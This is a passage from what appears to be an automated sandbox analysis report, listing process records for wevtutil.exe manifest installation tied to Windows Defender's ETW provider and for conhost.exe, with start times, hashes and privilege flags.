                  Commandline:C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\A491FE0B-CBB3-0812-A9E9-28E6069853FA.man
                  Imagebase:0x7ff7baff0000
                  File size:291840 bytes
                  MD5 hash:C57C1292650B6384903FE6408D412CFA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Start time:16:38:05
                  Start date:27/09/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff664700000
                  File size:875008 bytes
                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Start time:16:38:06
                  Start date:27/09/2021
                  Path:C:\Windows\System32\wevtutil.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\A491FE0B-CBB3-0812-A9E9-28E6069853FA.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
                  Imagebase:0x7ff7baff0000
                  File size:291840 bytes
                  MD5 hash:C57C1292650B6384903FE6408D412CFA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  General

                  Start time:16:38:06
                  Start date:27/09/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff664700000
                  File size:875008 bytes
                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
